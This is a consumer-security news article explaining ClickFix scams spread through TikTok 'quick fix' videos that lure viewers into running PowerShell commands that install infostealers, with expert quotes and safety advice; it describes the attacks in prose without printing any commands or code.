In certain instances, we may earn revenue when a reader makes a purchase or completes a form through our pages or on a partner’s website. We adhere to a strict 
If you’re active on TikTok, you’ll notice it’s grown from just a digital playground for teens dancing to flashy memes to a place where people, both young and old, jump on trends, share loads of tips and tricks, and find quick fixes for everyday problems.
However, a recent Trend Micro research has confirmed that TikTok quick-fix videos have become a launchpad for ClickFix attacks, which have quietly turned viewers into victims.
The videos are often disguised to offer simple hacks for issues relating to Windows OS, Microsoft Office activation, or unlocking paid features in apps like CapCut. But in essence, they are tuned to deliver ClickFix malware.
Here’s everything you need to know about ClickFix scams on TikTok, why it’s proving so alarmingly effective, and how you may become a victim.
Key Takeaways
- ClickFix scams use TikTok videos to trick users into downloading malware disguised as quick tech fixes.
- The videos often promote PowerShell commands or third-party downloads that install infostealers like Vidar or StealC.
- These scams rely on trusted hosting sites, such as GitHub and Dropbox, to appear legitimate and evade user suspicion.
- AI-generated videos make the scams harder to detect by removing common red flags like poor editing or unnatural dialogue.
- Experts urge users to “pause and verify” any tech advice from social media and cross-check it with trusted sources.
What Is ClickFix Scam?
As the name suggests, ClickFix is a type of social engineering attack that disguises malware execution as a quick computer fix. The name comes from the behavior it encourages: just a few clicks, and your problem is fixed. However, in the real sense of it, those steps quietly lure you to install malware that can harvest everything from saved passwords to crypto wallet data.
Late last year, security firm Proofpoint observed a surge in ClickFix scams, which had started appearing in phishing emails and fake software update pages. The tactic lures users with fake error messages and prompts them to copy and run a PowerShell command, often laden with malware.
In a chat with Techopedia, Steve Tcherchian, CEO of cybersecurity company XYPRO, explained why TikTok viralizes ClickFix videos. He said:
“TikTok’s algorithm amplifies engaging content fast, even if it’s malicious. Unlike email or forums, users are conditioned to trust and act quickly, especially when the video appears helpful or urgent.”
Inside Trend Micro’s Investigation
In a recent investigation, researchers at Trend Micro uncovered a malware campaign that’s hiding in what appears to be ordinary AI-generated tech-help videos, with instructions on how to unlock premium software features for free.
The commands given in these videos download a remote script on your computer that creates hidden folders and tells Windows Defender to ignore them. It then downloads malware, often infostealers like Vidar or StealC, and runs it with elevated privileges. If successful, the script installs a second file that ensures the malware runs at startup.
The script goes further to delete temporary folders, a step the researchers say is designed to minimize forensic traces and keep the malware under the radar.
To make the content more convincing, the download links shown in the tutorials led to well-known platforms like GitHub, Dropbox, and MediaFire.
Many of the accounts alleged to be pushing this content were no longer active at the time of writing, but the quick-fix videos they posted reached thousands of viewers. One of the videos reportedly pulled in nearly 500,000 views before it was taken down.
Shaila Rana, IEEE Senior Member and Professor of Cybersecurity at Purdue University Global, told Techopedia that these types of ClickFix attacks are very tricky to detect and even harder to stop because AI refines them and removes easy red flags. She said:
“AI-generated videos eliminate traditional red flags that users rely on to identify scams – poor production quality, obvious fakeness, or suspicious-looking presenters.”
Why TikTok ClickFix Attacks Are a Real Threat
While the ClickFix campaign spotted by Proofpoint last year used fake error message dialogue boxes to trick victims, the more recent surge uncovered by Trend Micro is more dangerous. The scammers now impersonate trusted software such as Microsoft Word, Spotify, CapCut, and others, making the scam far more deceptive and deadly.
To add to that, hack videos on TikTok or other social media channels are rarely seen as serious cybersecurity risks. As a result, people generally don’t expect to be hacked simply by following a perceived DIY video.
Jimmie Lee, Founder and CEO at JLEE, explained this dynamic to Techopedia. He said:
“TikTok and social media platforms are the go-to hubs for life hacks, learning from tutorials, and identifying trends. Which means there is a level of assumed trust in the platform, which drops a person’s guard down.”
Trend Micro researchers maintain that another factor making TikTok scams in the form of ClickFix campaigns dangerous is their reliance on social engineering within the video itself.
“There is no malicious code present on the platform for security solutions to analyze or block. All actionable content is delivered visually and aurally,” they wrote in the report. This strategy helps the campaign evade traditional security tools that scan for suspicious links or code.
How You Can Stay Safe
Avoiding ClickFix scams begins with skepticism on platforms like TikTok, where viral content can feel more trustworthy than it is.
If a video encourages you to copy PowerShell commands or download files from an unfamiliar link, it is safest to ignore it. Even when links point to trusted platforms like GitHub, Google Drive, or Dropbox, that does not mean the files themselves are secure.
Users can also be protected from downloading harmful files at the browser level, says Professor Rana.
“Browsers could enhance download warnings specifically for executables linked from social media,” she said while emphasizing the need to “promote the use of official app stores and verified software sources. She further advises users to cross-reference any “tech fix” with multiple sources before taking action.
Professor Rana also encourages a shift in how people approach online advice. “User education should focus on the ‘pause and verify’ principle,” she explains. It should “encourage users to independently search for software solutions rather than following video instructions.”
Social media platforms could also play a larger role in protecting their users, and Tcherchian believes subtle reminders could help.
“Short in-app reminders like ‘Never install fixes from comments or bios’ can go a long way without killing the vibe,” he says. Still, he acknowledges that platforms may be reluctant to introduce these features. “All of this may lead to lower engagement and thus good luck seeing any of this any time soon.”
The Bottom Line
ClickFix reflects the shape of modern cyber threats, where social media virality and subtle malware delivery go hand in hand. Until stronger protections are built into these platforms, users are left to navigate these risks on their own.
Any video that asks you to follow commands, click a link, or download a file should be treated with caution because trendiness is not the same as trustworthiness.
If something feels off or too convenient, take a moment to verify it through reliable sources. That brief pause could prevent a major breach. It has made a difference for me more than once, not just on social media but in other online spaces where threats are easy to overlook.
